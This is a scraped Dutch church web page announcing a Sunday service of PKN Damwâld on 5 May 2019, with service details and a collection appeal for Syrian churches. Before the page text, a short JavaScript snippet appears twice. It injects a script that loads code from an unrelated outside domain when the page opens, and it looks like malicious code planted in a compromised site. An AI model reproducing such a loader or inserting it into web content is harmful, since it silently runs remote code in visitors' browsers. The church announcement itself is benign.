;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 mei 2019 9:30 uur - PKN Damwâld
zondag 5 mei 2019
09:30 uur

Kerkdienst zondag 5 mei 2019 9:30 uur

Informatie

Voorganger:Ds. S. Boukes
Organist:Tim van der Weide
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: KIA collecte Noodhulp mei

Noodhulp Syrië- Syrische kerken als bakens van hoop.
Na een uitzichtloze burgeroorlog sinds 2011 ligt Syrië in puin. Van de 18 miljoen Syriërs zijn 12 miljoen mensen op drift, een groot deel in Syrië zelf of in buurlanden als Jordanië en Libanon. Steeds meer mensen in nood doen een beroep op kerken voor onderdak, voedsel en veiligheid. De zelf zwaar getroffen Syrische kerken bieden tussen de puinhopen hulp aan iedereen die bij hen aanklopt, ongeacht religie of politieke voorkeur. Syrische kerken zijn inmiddels de grootste hulpverlener in Syrië. Syrië is voor hulporganisaties moeilijk toegankelijk: zij moeten van de overheid toegang krijgen tot de getroffen regio’s. Kerken hebben die barrière niet: zij zijn van oudsher aanwezig in gebieden die voor andere hulporganisaties niet altijd bereikbaar zijn. Ook zitten ze tot in de haarvaten van de samenleving. Kerken delen tot in de verste uithoeken van het land voedselpakketten uit, helpen ontheemden bij het zoeken naar onderdak of werk en bieden vluchtelingkinderen onderwijs of psychologische hulp. Deze Syrische kerken stellen de betrokkenheid van kerken in Nederland zeer op prijs. Zij ervaren die als steun in de rug. Samen met Kerk in Actie steunen we de kerken in Syrië, zodat zij moed houden om hun belangrijke werk te blijven doen. Zolang zij zich inzetten laten we hen niet met lege handen staan.
• voor 18 euro krijgt een gezin een pakket babyvoeding
• voor 32 euro krijgt een gezin een voedselpakket
• voor 75 euro kan een gevlucht gezin een maand lang een kamer huren
Kijk voor meer informatie op www.kerkinactie.nl/kerkensyrie.
Uw bijdrage voor dit werk is welkom via de collecte, 5 mei. Of maak uw gift over op de rekening van de diaconie o.v.v. collecte 5 mei. Alvast hartelijk dank!

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris